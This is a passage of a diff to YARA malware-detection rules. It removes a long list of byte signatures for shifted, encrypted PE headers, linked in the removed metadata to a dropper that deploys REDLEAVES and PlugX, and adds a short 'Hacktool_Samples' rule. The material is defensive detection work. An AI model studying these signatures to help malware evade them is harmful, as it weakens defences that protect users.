-		$encrypted_pe_header_shift_40 = { 24 e1 28 75 82 b8 28 2b 28 28 28 aa 2c 28 58 27 27 28 }
-		$encrypted_pe_header_shift_41 = { 25 e2 29 76 83 b9 29 2c 29 29 29 ab 2d 29 59 28 28 29 }
-		$encrypted_pe_header_shift_42 = { 26 e3 2a 77 84 ba 2a 2d 2a 2a 2a ac 2e 2a 5a 29 29 2a }
-		$encrypted_pe_header_shift_43 = { 27 e4 2b 78 85 bb 2b 2e 2b 2b 2b ad 2f 2b 5b 2a 2a 2b }
-		$encrypted_pe_header_shift_44 = { 28 e5 2c 79 86 bc 2c 2f 2c 2c 2c ae 30 2c 5c 2b 2b 2c }
-		$encrypted_pe_header_shift_45 = { 29 e6 2d 7a 87 bd 2d 30 2d 2d 2d af 31 2d 5d 2c 2c 2d }
-		$encrypted_pe_header_shift_46 = { 2a e7 2e 7b 88 be 2e 31 2e 2e 2e b0 32 2e 5e 2d 2d 2e }
-		$encrypted_pe_header_shift_47 = { 2b e8 2f 7c 89 bf 2f 32 2f 2f 2f b1 33 2f 5f 2e 2e 2f }
-		$encrypted_pe_header_shift_48 = { 2c e9 30 7d 8a c0 30 33 30 30 30 b2 34 30 60 2f 2f 30 }
-		$encrypted_pe_header_shift_49 = { 2d ea 31 7e 8b c1 31 34 31 31 31 b3 35 31 61 30 30 31 }
-		$encrypted_pe_header_shift_50 = { 2e eb 32 7f 8c c2 32 35 32 32 32 b4 36 32 62 31 31 32 }
-		$encrypted_pe_header_shift_51 = { 2f ec 33 80 8d c3 33 36 33 33 33 b5 37 33 63 32 32 33 }
-		$encrypted_pe_header_shift_52 = { 30 ed 34 81 8e c4 34 37 34 34 34 b6 38 34 64 33 33 34 }
-		$encrypted_pe_header_shift_53 = { 31 ee 35 82 8f c5 35 38 35 35 35 b7 39 35 65 34 34 35 }
-		$encrypted_pe_header_shift_54 = { 32 ef 36 83 90 c6 36 39 36 36 36 b8 3a 36 66 35 35 36 }
-		$encrypted_pe_header_shift_55 = { 33 f0 37 84 91 c7 37 3a 37 37 37 b9 3b 37 67 36 36 37 }
-		$encrypted_pe_header_shift_56 = { 34 f1 38 85 92 c8 38 3b 38 38 38 ba 3c 38 68 37 37 38 }
-		$encrypted_pe_header_shift_57 = { 35 f2 39 86 93 c9 39 3c 39 39 39 bb 3d 39 69 38 38 39 }
-		$encrypted_pe_header_shift_58 = { 36 f3 3a 87 94 ca 3a 3d 3a 3a 3a bc 3e 3a 6a 39 39 3a }
-		$encrypted_pe_header_shift_59 = { 37 f4 3b 88 95 cb 3b 3e 3b 3b 3b bd 3f 3b 6b 3a 3a 3b }
-		$encrypted_pe_header_shift_60 = { 38 f5 3c 89 96 cc 3c 3f 3c 3c 3c be 40 3c 6c 3b 3b 3c }
-		$encrypted_pe_header_shift_61 = { 39 f6 3d 8a 97 cd 3d 40 3d 3d 3d bf 41 3d 6d 3c 3c 3d }
-		$encrypted_pe_header_shift_62 = { 3a f7 3e 8b 98 ce 3e 41 3e 3e 3e c0 42 3e 6e 3d 3d 3e }
-		$encrypted_pe_header_shift_63 = { 3b f8 3f 8c 99 cf 3f 42 3f 3f 3f c1 43 3f 6f 3e 3e 3f }
-		$encrypted_pe_header_shift_64 = { 3c f9 40 8d 9a d0 40 43 40 40 40 c2 44 40 70 3f 3f 40 }
-		$encrypted_pe_header_shift_65 = { 3d fa 41 8e 9b d1 41 44 41 41 41 c3 45 41 71 40 40 41 }
-		$encrypted_pe_header_shift_66 = { 3e fb 42 8f 9c d2 42 45 42 42 42 c4 46 42 72 41 41 42 }
-		$encrypted_pe_header_shift_67 = { 3f fc 43 90 9d d3 43 46 43 43 43 c5 47 43 73 42 42 43 }
-		$encrypted_pe_header_shift_68 = { 40 fd 44 91 9e d4 44 47 44 44 44 c6 48 44 74 43 43 44 }
-		$encrypted_pe_header_shift_69 = { 41 fe 45 92 9f d5 45 48 45 45 45 c7 49 45 75 44 44 45 }
-		$encrypted_pe_header_shift_70 = { 42 ff 46 93 a0 d6 46 49 46 46 46 c8 4a 46 76 45 45 46 }
-		$encrypted_pe_header_shift_71 = { 43 00 47 94 a1 d7 47 4a 47 47 47 c9 4b 47 77 46 46 47 }
-		$encrypted_pe_header_shift_72 = { 44 01 48 95 a2 d8 48 4b 48 48 48 ca 4c 48 78 47 47 48 }
-		$encrypted_pe_header_shift_73 = { 45 02 49 96 a3 d9 49 4c 49 49 49 cb 4d 49 79 48 48 49 }
-		$encrypted_pe_header_shift_74 = { 46 03 4a 97 a4 da 4a 4d 4a 4a 4a cc 4e 4a 7a 49 49 4a }
-		$encrypted_pe_header_shift_75 = { 47 04 4b 98 a5 db 4b 4e 4b 4b 4b cd 4f 4b 7b 4a 4a 4b }
-		$encrypted_pe_header_shift_76 = { 48 05 4c 99 a6 dc 4c 4f 4c 4c 4c ce 50 4c 7c 4b 4b 4c }
-		$encrypted_pe_header_shift_77 = { 49 06 4d 9a a7 dd 4d 50 4d 4d 4d cf 51 4d 7d 4c 4c 4d }
-		$encrypted_pe_header_shift_78 = { 4a 07 4e 9b a8 de 4e 51 4e 4e 4e d0 52 4e 7e 4d 4d 4e }
-		$encrypted_pe_header_shift_79 = { 4b 08 4f 9c a9 df 4f 52 4f 4f 4f d1 53 4f 7f 4e 4e 4f }
-		$encrypted_pe_header_shift_80 = { 4c 09 50 9d aa e0 50 53 50 50 50 d2 54 50 80 4f 4f 50 }
-		$encrypted_pe_header_shift_81 = { 4d 0a 51 9e ab e1 51 54 51 51 51 d3 55 51 81 50 50 51 }
-		$encrypted_pe_header_shift_82 = { 4e 0b 52 9f ac e2 52 55 52 52 52 d4 56 52 82 51 51 52 }
-		$encrypted_pe_header_shift_83 = { 4f 0c 53 a0 ad e3 53 56 53 53 53 d5 57 53 83 52 52 53 }
-		$encrypted_pe_header_shift_84 = { 50 0d 54 a1 ae e4 54 57 54 54 54 d6 58 54 84 53 53 54 }
-		$encrypted_pe_header_shift_85 = { 51 0e 55 a2 af e5 55 58 55 55 55 d7 59 55 85 54 54 55 }
-		$encrypted_pe_header_shift_86 = { 52 0f 56 a3 b0 e6 56 59 56 56 56 d8 5a 56 86 55 55 56 }
-		$encrypted_pe_header_shift_87 = { 53 10 57 a4 b1 e7 57 5a 57 57 57 d9 5b 57 87 56 56 57 }
-		$encrypted_pe_header_shift_88 = { 54 11 58 a5 b2 e8 58 5b 58 58 58 da 5c 58 88 57 57 58 }
-		$encrypted_pe_header_shift_89 = { 55 12 59 a6 b3 e9 59 5c 59 59 59 db 5d 59 89 58 58 59 }
-		$encrypted_pe_header_shift_90 = { 56 13 5a a7 b4 ea 5a 5d 5a 5a 5a dc 5e 5a 8a 59 59 5a }
-		$encrypted_pe_header_shift_91 = { 57 14 5b a8 b5 eb 5b 5e 5b 5b 5b dd 5f 5b 8b 5a 5a 5b }
-		$encrypted_pe_header_shift_92 = { 58 15 5c a9 b6 ec 5c 5f 5c 5c 5c de 60 5c 8c 5b 5b 5c }
-		$encrypted_pe_header_shift_93 = { 59 16 5d aa b7 ed 5d 60 5d 5d 5d df 61 5d 8d 5c 5c 5d }
-		$encrypted_pe_header_shift_94 = { 5a 17 5e ab b8 ee 5e 61 5e 5e 5e e0 62 5e 8e 5d 5d 5e }
-		$encrypted_pe_header_shift_95 = { 5b 18 5f ac b9 ef 5f 62 5f 5f 5f e1 63 5f 8f 5e 5e 5f }
-		$encrypted_pe_header_shift_96 = { 5c 19 60 ad ba f0 60 63 60 60 60 e2 64 60 90 5f 5f 60 }
-		$encrypted_pe_header_shift_97 = { 5d 1a 61 ae bb f1 61 64 61 61 61 e3 65 61 91 60 60 61 }
-		$encrypted_pe_header_shift_98 = { 5e 1b 62 af bc f2 62 65 62 62 62 e4 66 62 92 61 61 62 }
-		$encrypted_pe_header_shift_99 = { 5f 1c 63 b0 bd f3 63 66 63 63 63 e5 67 63 93 62 62 63 }
-		$encrypted_pe_header_shift_100 = { 60 1d 64 b1 be f4 64 67 64 64 64 e6 68 64 94 63 63 64 }
-		$encrypted_pe_header_shift_101 = { 61 1e 65 b2 bf f5 65 68 65 65 65 e7 69 65 95 64 64 65 }
-		$encrypted_pe_header_shift_102 = { 62 1f 66 b3 c0 f6 66 69 66 66 66 e8 6a 66 96 65 65 66 }
-		$encrypted_pe_header_shift_103 = { 63 20 67 b4 c1 f7 67 6a 67 67 67 e9 6b 67 97 66 66 67 }
-		$encrypted_pe_header_shift_104 = { 64 21 68 b5 c2 f8 68 6b 68 68 68 ea 6c 68 98 67 67 68 }
-		$encrypted_pe_header_shift_105 = { 65 22 69 b6 c3 f9 69 6c 69 69 69 eb 6d 69 99 68 68 69 }
-		$encrypted_pe_header_shift_106 = { 66 23 6a b7 c4 fa 6a 6d 6a 6a 6a ec 6e 6a 9a 69 69 6a }
-		$encrypted_pe_header_shift_107 = { 67 24 6b b8 c5 fb 6b 6e 6b 6b 6b ed 6f 6b 9b 6a 6a 6b }
-		$encrypted_pe_header_shift_108 = { 68 25 6c b9 c6 fc 6c 6f 6c 6c 6c ee 70 6c 9c 6b 6b 6c }
-		$encrypted_pe_header_shift_109 = { 69 26 6d ba c7 fd 6d 70 6d 6d 6d ef 71 6d 9d 6c 6c 6d }
-		$encrypted_pe_header_shift_110 = { 6a 27 6e bb c8 fe 6e 71 6e 6e 6e f0 72 6e 9e 6d 6d 6e }
-		$encrypted_pe_header_shift_111 = { 6b 28 6f bc c9 ff 6f 72 6f 6f 6f f1 73 6f 9f 6e 6e 6f }
-		$encrypted_pe_header_shift_112 = { 6c 29 70 bd ca 00 70 73 70 70 70 f2 74 70 a0 6f 6f 70 }
-		$encrypted_pe_header_shift_113 = { 6d 2a 71 be cb 01 71 74 71 71 71 f3 75 71 a1 70 70 71 }
-		$encrypted_pe_header_shift_114 = { 6e 2b 72 bf cc 02 72 75 72 72 72 f4 76 72 a2 71 71 72 }
-		$encrypted_pe_header_shift_115 = { 6f 2c 73 c0 cd 03 73 76 73 73 73 f5 77 73 a3 72 72 73 }
-		$encrypted_pe_header_shift_116 = { 70 2d 74 c1 ce 04 74 77 74 74 74 f6 78 74 a4 73 73 74 }
-		$encrypted_pe_header_shift_117 = { 71 2e 75 c2 cf 05 75 78 75 75 75 f7 79 75 a5 74 74 75 }
-		$encrypted_pe_header_shift_118 = { 72 2f 76 c3 d0 06 76 79 76 76 76 f8 7a 76 a6 75 75 76 }
-		$encrypted_pe_header_shift_119 = { 73 30 77 c4 d1 07 77 7a 77 77 77 f9 7b 77 a7 76 76 77 }
-		$encrypted_pe_header_shift_120 = { 74 31 78 c5 d2 08 78 7b 78 78 78 fa 7c 78 a8 77 77 78 }
-		$encrypted_pe_header_shift_121 = { 75 32 79 c6 d3 09 79 7c 79 79 79 fb 7d 79 a9 78 78 79 }
-		$encrypted_pe_header_shift_122 = { 76 33 7a c7 d4 0a 7a 7d 7a 7a 7a fc 7e 7a aa 79 79 7a }
-		$encrypted_pe_header_shift_123 = { 77 34 7b c8 d5 0b 7b 7e 7b 7b 7b fd 7f 7b ab 7a 7a 7b }
-		$encrypted_pe_header_shift_124 = { 78 35 7c c9 d6 0c 7c 7f 7c 7c 7c fe 80 7c ac 7b 7b 7c }
-		$encrypted_pe_header_shift_125 = { 79 36 7d ca d7 0d 7d 80 7d 7d 7d ff 81 7d ad 7c 7c 7d }
-		$encrypted_pe_header_shift_126 = { 7a 37 7e cb d8 0e 7e 81 7e 7e 7e 00 82 7e ae 7d 7d 7e }
-		$encrypted_pe_header_shift_127 = { 7b 38 7f cc d9 0f 7f 82 7f 7f 7f 01 83 7f af 7e 7e 7f }
-		$encrypted_pe_header_shift_128 = { 7c 39 80 cd da 10 80 83 80 80 80 02 84 80 b0 7f 7f 80 }
-		$encrypted_pe_header_shift_129 = { 7d 3a 81 ce db 11 81 84 81 81 81 03 85 81 b1 80 80 81 }
-		$encrypted_pe_header_shift_130 = { 7e 3b 82 cf dc 12 82 85 82 82 82 04 86 82 b2 81 81 82 }
-		$encrypted_pe_header_shift_131 = { 7f 3c 83 d0 dd 13 83 86 83 83 83 05 87 83 b3 82 82 83 }
-		$encrypted_pe_header_shift_132 = { 80 3d 84 d1 de 14 84 87 84 84 84 06 88 84 b4 83 83 84 }
-		$encrypted_pe_header_shift_133 = { 81 3e 85 d2 df 15 85 88 85 85 85 07 89 85 b5 84 84 85 }
-		$encrypted_pe_header_shift_134 = { 82 3f 86 d3 e0 16 86 89 86 86 86 08 8a 86 b6 85 85 86 }
-		$encrypted_pe_header_shift_135 = { 83 40 87 d4 e1 17 87 8a 87 87 87 09 8b 87 b7 86 86 87 }
-		$encrypted_pe_header_shift_136 = { 84 41 88 d5 e2 18 88 8b 88 88 88 0a 8c 88 b8 87 87 88 }
-		$encrypted_pe_header_shift_137 = { 85 42 89 d6 e3 19 89 8c 89 89 89 0b 8d 89 b9 88 88 89 }
-		$encrypted_pe_header_shift_138 = { 86 43 8a d7 e4 1a 8a 8d 8a 8a 8a 0c 8e 8a ba 89 89 8a }
-		$encrypted_pe_header_shift_139 = { 87 44 8b d8 e5 1b 8b 8e 8b 8b 8b 0d 8f 8b bb 8a 8a 8b }
-		$encrypted_pe_header_shift_140 = { 88 45 8c d9 e6 1c 8c 8f 8c 8c 8c 0e 90 8c bc 8b 8b 8c }
-		$encrypted_pe_header_shift_141 = { 89 46 8d da e7 1d 8d 90 8d 8d 8d 0f 91 8d bd 8c 8c 8d }
-		$encrypted_pe_header_shift_142 = { 8a 47 8e db e8 1e 8e 91 8e 8e 8e 10 92 8e be 8d 8d 8e }
-		$encrypted_pe_header_shift_143 = { 8b 48 8f dc e9 1f 8f 92 8f 8f 8f 11 93 8f bf 8e 8e 8f }
-		$encrypted_pe_header_shift_144 = { 8c 49 90 dd ea 20 90 93 90 90 90 12 94 90 c0 8f 8f 90 }
-		$encrypted_pe_header_shift_145 = { 8d 4a 91 de eb 21 91 94 91 91 91 13 95 91 c1 90 90 91 }
-		$encrypted_pe_header_shift_146 = { 8e 4b 92 df ec 22 92 95 92 92 92 14 96 92 c2 91 91 92 }
-		$encrypted_pe_header_shift_147 = { 8f 4c 93 e0 ed 23 93 96 93 93 93 15 97 93 c3 92 92 93 }
-		$encrypted_pe_header_shift_148 = { 90 4d 94 e1 ee 24 94 97 94 94 94 16 98 94 c4 93 93 94 }
-		$encrypted_pe_header_shift_149 = { 91 4e 95 e2 ef 25 95 98 95 95 95 17 99 95 c5 94 94 95 }
-		$encrypted_pe_header_shift_150 = { 92 4f 96 e3 f0 26 96 99 96 96 96 18 9a 96 c6 95 95 96 }
-		$encrypted_pe_header_shift_151 = { 93 50 97 e4 f1 27 97 9a 97 97 97 19 9b 97 c7 96 96 97 }
-		$encrypted_pe_header_shift_152 = { 94 51 98 e5 f2 28 98 9b 98 98 98 1a 9c 98 c8 97 97 98 }
-		$encrypted_pe_header_shift_153 = { 95 52 99 e6 f3 29 99 9c 99 99 99 1b 9d 99 c9 98 98 99 }
-		$encrypted_pe_header_shift_154 = { 96 53 9a e7 f4 2a 9a 9d 9a 9a 9a 1c 9e 9a ca 99 99 9a }
-		$encrypted_pe_header_shift_155 = { 97 54 9b e8 f5 2b 9b 9e 9b 9b 9b 1d 9f 9b cb 9a 9a 9b }
-		$encrypted_pe_header_shift_156 = { 98 55 9c e9 f6 2c 9c 9f 9c 9c 9c 1e a0 9c cc 9b 9b 9c }
-		$encrypted_pe_header_shift_157 = { 99 56 9d ea f7 2d 9d a0 9d 9d 9d 1f a1 9d cd 9c 9c 9d }
-		$encrypted_pe_header_shift_158 = { 9a 57 9e eb f8 2e 9e a1 9e 9e 9e 20 a2 9e ce 9d 9d 9e }
-		$encrypted_pe_header_shift_159 = { 9b 58 9f ec f9 2f 9f a2 9f 9f 9f 21 a3 9f cf 9e 9e 9f }
-		$encrypted_pe_header_shift_160 = { 9c 59 a0 ed fa 30 a0 a3 a0 a0 a0 22 a4 a0 d0 9f 9f a0 }
-		$encrypted_pe_header_shift_161 = { 9d 5a a1 ee fb 31 a1 a4 a1 a1 a1 23 a5 a1 d1 a0 a0 a1 }
-		$encrypted_pe_header_shift_162 = { 9e 5b a2 ef fc 32 a2 a5 a2 a2 a2 24 a6 a2 d2 a1 a1 a2 }
-		$encrypted_pe_header_shift_163 = { 9f 5c a3 f0 fd 33 a3 a6 a3 a3 a3 25 a7 a3 d3 a2 a2 a3 }
-		$encrypted_pe_header_shift_164 = { a0 5d a4 f1 fe 34 a4 a7 a4 a4 a4 26 a8 a4 d4 a3 a3 a4 }
-		$encrypted_pe_header_shift_165 = { a1 5e a5 f2 ff 35 a5 a8 a5 a5 a5 27 a9 a5 d5 a4 a4 a5 }
-		$encrypted_pe_header_shift_166 = { a2 5f a6 f3 00 36 a6 a9 a6 a6 a6 28 aa a6 d6 a5 a5 a6 }
-		$encrypted_pe_header_shift_167 = { a3 60 a7 f4 01 37 a7 aa a7 a7 a7 29 ab a7 d7 a6 a6 a7 }
-		$encrypted_pe_header_shift_168 = { a4 61 a8 f5 02 38 a8 ab a8 a8 a8 2a ac a8 d8 a7 a7 a8 }
-		$encrypted_pe_header_shift_169 = { a5 62 a9 f6 03 39 a9 ac a9 a9 a9 2b ad a9 d9 a8 a8 a9 }
-		$encrypted_pe_header_shift_170 = { a6 63 aa f7 04 3a aa ad aa aa aa 2c ae aa da a9 a9 aa }
-		$encrypted_pe_header_shift_171 = { a7 64 ab f8 05 3b ab ae ab ab ab 2d af ab db aa aa ab }
-		$encrypted_pe_header_shift_172 = { a8 65 ac f9 06 3c ac af ac ac ac 2e b0 ac dc ab ab ac }
-		$encrypted_pe_header_shift_173 = { a9 66 ad fa 07 3d ad b0 ad ad ad 2f b1 ad dd ac ac ad }
-		$encrypted_pe_header_shift_174 = { aa 67 ae fb 08 3e ae b1 ae ae ae 30 b2 ae de ad ad ae }
-		$encrypted_pe_header_shift_175 = { ab 68 af fc 09 3f af b2 af af af 31 b3 af df ae ae af }
-		$encrypted_pe_header_shift_176 = { ac 69 b0 fd 0a 40 b0 b3 b0 b0 b0 32 b4 b0 e0 af af b0 }
-		$encrypted_pe_header_shift_177 = { ad 6a b1 fe 0b 41 b1 b4 b1 b1 b1 33 b5 b1 e1 b0 b0 b1 }
-		$encrypted_pe_header_shift_178 = { ae 6b b2 ff 0c 42 b2 b5 b2 b2 b2 34 b6 b2 e2 b1 b1 b2 }
-		$encrypted_pe_header_shift_179 = { af 6c b3 00 0d 43 b3 b6 b3 b3 b3 35 b7 b3 e3 b2 b2 b3 }
-		$encrypted_pe_header_shift_180 = { b0 6d b4 01 0e 44 b4 b7 b4 b4 b4 36 b8 b4 e4 b3 b3 b4 }
-		$encrypted_pe_header_shift_181 = { b1 6e b5 02 0f 45 b5 b8 b5 b5 b5 37 b9 b5 e5 b4 b4 b5 }
-		$encrypted_pe_header_shift_182 = { b2 6f b6 03 10 46 b6 b9 b6 b6 b6 38 ba b6 e6 b5 b5 b6 }
-		$encrypted_pe_header_shift_183 = { b3 70 b7 04 11 47 b7 ba b7 b7 b7 39 bb b7 e7 b6 b6 b7 }
-		$encrypted_pe_header_shift_184 = { b4 71 b8 05 12 48 b8 bb b8 b8 b8 3a bc b8 e8 b7 b7 b8 }
-		$encrypted_pe_header_shift_185 = { b5 72 b9 06 13 49 b9 bc b9 b9 b9 3b bd b9 e9 b8 b8 b9 }
-		$encrypted_pe_header_shift_186 = { b6 73 ba 07 14 4a ba bd ba ba ba 3c be ba ea b9 b9 ba }
-		$encrypted_pe_header_shift_187 = { b7 74 bb 08 15 4b bb be bb bb bb 3d bf bb eb ba ba bb }
-		$encrypted_pe_header_shift_188 = { b8 75 bc 09 16 4c bc bf bc bc bc 3e c0 bc ec bb bb bc }
-		$encrypted_pe_header_shift_189 = { b9 76 bd 0a 17 4d bd c0 bd bd bd 3f c1 bd ed bc bc bd }
-		$encrypted_pe_header_shift_190 = { ba 77 be 0b 18 4e be c1 be be be 40 c2 be ee bd bd be }
-		$encrypted_pe_header_shift_191 = { bb 78 bf 0c 19 4f bf c2 bf bf bf 41 c3 bf ef be be bf }
-		$encrypted_pe_header_shift_192 = { bc 79 c0 0d 1a 50 c0 c3 c0 c0 c0 42 c4 c0 f0 bf bf c0 }
-		$encrypted_pe_header_shift_193 = { bd 7a c1 0e 1b 51 c1 c4 c1 c1 c1 43 c5 c1 f1 c0 c0 c1 }
-		$encrypted_pe_header_shift_194 = { be 7b c2 0f 1c 52 c2 c5 c2 c2 c2 44 c6 c2 f2 c1 c1 c2 }
-		$encrypted_pe_header_shift_195 = { bf 7c c3 10 1d 53 c3 c6 c3 c3 c3 45 c7 c3 f3 c2 c2 c3 }
-		$encrypted_pe_header_shift_196 = { c0 7d c4 11 1e 54 c4 c7 c4 c4 c4 46 c8 c4 f4 c3 c3 c4 }
-		$encrypted_pe_header_shift_197 = { c1 7e c5 12 1f 55 c5 c8 c5 c5 c5 47 c9 c5 f5 c4 c4 c5 }
-		$encrypted_pe_header_shift_198 = { c2 7f c6 13 20 56 c6 c9 c6 c6 c6 48 ca c6 f6 c5 c5 c6 }
-		$encrypted_pe_header_shift_199 = { c3 80 c7 14 21 57 c7 ca c7 c7 c7 49 cb c7 f7 c6 c6 c7 }
-		$encrypted_pe_header_shift_200 = { c4 81 c8 15 22 58 c8 cb c8 c8 c8 4a cc c8 f8 c7 c7 c8 }
-		$encrypted_pe_header_shift_201 = { c5 82 c9 16 23 59 c9 cc c9 c9 c9 4b cd c9 f9 c8 c8 c9 }
-		$encrypted_pe_header_shift_202 = { c6 83 ca 17 24 5a ca cd ca ca ca 4c ce ca fa c9 c9 ca }
-		$encrypted_pe_header_shift_203 = { c7 84 cb 18 25 5b cb ce cb cb cb 4d cf cb fb ca ca cb }
-		$encrypted_pe_header_shift_204 = { c8 85 cc 19 26 5c cc cf cc cc cc 4e d0 cc fc cb cb cc }
-		$encrypted_pe_header_shift_205 = { c9 86 cd 1a 27 5d cd d0 cd cd cd 4f d1 cd fd cc cc cd }
-		$encrypted_pe_header_shift_206 = { ca 87 ce 1b 28 5e ce d1 ce ce ce 50 d2 ce fe cd cd ce }
-		$encrypted_pe_header_shift_207 = { cb 88 cf 1c 29 5f cf d2 cf cf cf 51 d3 cf ff ce ce cf }
-		$encrypted_pe_header_shift_208 = { cc 89 d0 1d 2a 60 d0 d3 d0 d0 d0 52 d4 d0 00 cf cf d0 }
-		$encrypted_pe_header_shift_209 = { cd 8a d1 1e 2b 61 d1 d4 d1 d1 d1 53 d5 d1 01 d0 d0 d1 }
-		$encrypted_pe_header_shift_210 = { ce 8b d2 1f 2c 62 d2 d5 d2 d2 d2 54 d6 d2 02 d1 d1 d2 }
-		$encrypted_pe_header_shift_211 = { cf 8c d3 20 2d 63 d3 d6 d3 d3 d3 55 d7 d3 03 d2 d2 d3 }
-		$encrypted_pe_header_shift_212 = { d0 8d d4 21 2e 64 d4 d7 d4 d4 d4 56 d8 d4 04 d3 d3 d4 }
-		$encrypted_pe_header_shift_213 = { d1 8e d5 22 2f 65 d5 d8 d5 d5 d5 57 d9 d5 05 d4 d4 d5 }
-		$encrypted_pe_header_shift_214 = { d2 8f d6 23 30 66 d6 d9 d6 d6 d6 58 da d6 06 d5 d5 d6 }
-		$encrypted_pe_header_shift_215 = { d3 90 d7 24 31 67 d7 da d7 d7 d7 59 db d7 07 d6 d6 d7 }
-		$encrypted_pe_header_shift_216 = { d4 91 d8 25 32 68 d8 db d8 d8 d8 5a dc d8 08 d7 d7 d8 }
-		$encrypted_pe_header_shift_217 = { d5 92 d9 26 33 69 d9 dc d9 d9 d9 5b dd d9 09 d8 d8 d9 }
-		$encrypted_pe_header_shift_218 = { d6 93 da 27 34 6a da dd da da da 5c de da 0a d9 d9 da }
-		$encrypted_pe_header_shift_219 = { d7 94 db 28 35 6b db de db db db 5d df db 0b da da db }
-		$encrypted_pe_header_shift_220 = { d8 95 dc 29 36 6c dc df dc dc dc 5e e0 dc 0c db db dc }
-		$encrypted_pe_header_shift_221 = { d9 96 dd 2a 37 6d dd e0 dd dd dd 5f e1 dd 0d dc dc dd }
-		$encrypted_pe_header_shift_222 = { da 97 de 2b 38 6e de e1 de de de 60 e2 de 0e dd dd de }
-		$encrypted_pe_header_shift_223 = { db 98 df 2c 39 6f df e2 df df df 61 e3 df 0f de de df }
-		$encrypted_pe_header_shift_224 = { dc 99 e0 2d 3a 70 e0 e3 e0 e0 e0 62 e4 e0 10 df df e0 }
-		$encrypted_pe_header_shift_225 = { dd 9a e1 2e 3b 71 e1 e4 e1 e1 e1 63 e5 e1 11 e0 e0 e1 }
-		$encrypted_pe_header_shift_226 = { de 9b e2 2f 3c 72 e2 e5 e2 e2 e2 64 e6 e2 12 e1 e1 e2 }
-		$encrypted_pe_header_shift_227 = { df 9c e3 30 3d 73 e3 e6 e3 e3 e3 65 e7 e3 13 e2 e2 e3 }
-		$encrypted_pe_header_shift_228 = { e0 9d e4 31 3e 74 e4 e7 e4 e4 e4 66 e8 e4 14 e3 e3 e4 }
-		$encrypted_pe_header_shift_229 = { e1 9e e5 32 3f 75 e5 e8 e5 e5 e5 67 e9 e5 15 e4 e4 e5 }
-		$encrypted_pe_header_shift_230 = { e2 9f e6 33 40 76 e6 e9 e6 e6 e6 68 ea e6 16 e5 e5 e6 }
-		$encrypted_pe_header_shift_231 = { e3 a0 e7 34 41 77 e7 ea e7 e7 e7 69 eb e7 17 e6 e6 e7 }
-		$encrypted_pe_header_shift_232 = { e4 a1 e8 35 42 78 e8 eb e8 e8 e8 6a ec e8 18 e7 e7 e8 }
-		$encrypted_pe_header_shift_233 = { e5 a2 e9 36 43 79 e9 ec e9 e9 e9 6b ed e9 19 e8 e8 e9 }
-		$encrypted_pe_header_shift_234 = { e6 a3 ea 37 44 7a ea ed ea ea ea 6c ee ea 1a e9 e9 ea }
-		$encrypted_pe_header_shift_235 = { e7 a4 eb 38 45 7b eb ee eb eb eb 6d ef eb 1b ea ea eb }
-		$encrypted_pe_header_shift_236 = { e8 a5 ec 39 46 7c ec ef ec ec ec 6e f0 ec 1c eb eb ec }
-		$encrypted_pe_header_shift_237 = { e9 a6 ed 3a 47 7d ed f0 ed ed ed 6f f1 ed 1d ec ec ed }
-		$encrypted_pe_header_shift_238 = { ea a7 ee 3b 48 7e ee f1 ee ee ee 70 f2 ee 1e ed ed ee }
-		$encrypted_pe_header_shift_239 = { eb a8 ef 3c 49 7f ef f2 ef ef ef 71 f3 ef 1f ee ee ef }
-		$encrypted_pe_header_shift_240 = { ec a9 f0 3d 4a 80 f0 f3 f0 f0 f0 72 f4 f0 20 ef ef f0 }
-		$encrypted_pe_header_shift_241 = { ed aa f1 3e 4b 81 f1 f4 f1 f1 f1 73 f5 f1 21 f0 f0 f1 }
-		$encrypted_pe_header_shift_242 = { ee ab f2 3f 4c 82 f2 f5 f2 f2 f2 74 f6 f2 22 f1 f1 f2 }
-		$encrypted_pe_header_shift_243 = { ef ac f3 40 4d 83 f3 f6 f3 f3 f3 75 f7 f3 23 f2 f2 f3 }
-		$encrypted_pe_header_shift_244 = { f0 ad f4 41 4e 84 f4 f7 f4 f4 f4 76 f8 f4 24 f3 f3 f4 }
-		$encrypted_pe_header_shift_245 = { f1 ae f5 42 4f 85 f5 f8 f5 f5 f5 77 f9 f5 25 f4 f4 f5 }
-		$encrypted_pe_header_shift_246 = { f2 af f6 43 50 86 f6 f9 f6 f6 f6 78 fa f6 26 f5 f5 f6 }
-		$encrypted_pe_header_shift_247 = { f3 b0 f7 44 51 87 f7 fa f7 f7 f7 79 fb f7 27 f6 f6 f7 }
-		$encrypted_pe_header_shift_248 = { f4 b1 f8 45 52 88 f8 fb f8 f8 f8 7a fc f8 28 f7 f7 f8 }
-		$encrypted_pe_header_shift_249 = { f5 b2 f9 46 53 89 f9 fc f9 f9 f9 7b fd f9 29 f8 f8 f9 }
-		$encrypted_pe_header_shift_250 = { f6 b3 fa 47 54 8a fa fd fa fa fa 7c fe fa 2a f9 f9 fa }
-		$encrypted_pe_header_shift_251 = { f7 b4 fb 48 55 8b fb fe fb fb fb 7d ff fb 2b fa fa fb }
-		$encrypted_pe_header_shift_252 = { f8 b5 fc 49 56 8c fc ff fc fc fc 7e 00 fc 2c fb fb fc }
-		$encrypted_pe_header_shift_253 = { f9 b6 fd 4a 57 8d fd 00 fd fd fd 7f 01 fd 2d fc fc fd }
-		$encrypted_pe_header_shift_254 = { fa b7 fe 4b 58 8e fe 01 fe fe fe 80 02 fe 2e fd fd fe }
-		$encrypted_pe_header_shift_255 = { fb b8 ff 4c 59 8f ff 02 ff ff ff 81 03 ff 2f fe fe ff }
+		$a = "00050;0F0M0X0a0v0}0"
+		$b = "vwgvwgvP76"
+		$c = "Pr0PhOFyP"
 
 	condition:
-		filesize < 200KB and ( 1 of ( $encrypted_pe_header_shift_* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Dropper_Deploysmalwareviasideloading
+rule SIGNATURE_BASE_Hacktool_Samples
 {
 	meta:
-		description = "Detects a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX"
-		author = "USG"
-		id = "2e7cdedd-2358-5d71-a3ec-73dec442d840"
-		date = "2024-04-17"
-		modified = "2024-04-17"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-117A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_uscert_ta17-1117a.yar#L9-L21"
+		description = "Hacktool"
+		author = "Florian Roth"
+		id = "ecacf84a-f66c-5c21-ae4b-fd9bfb5be384"
+		date = "2025-04-14"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
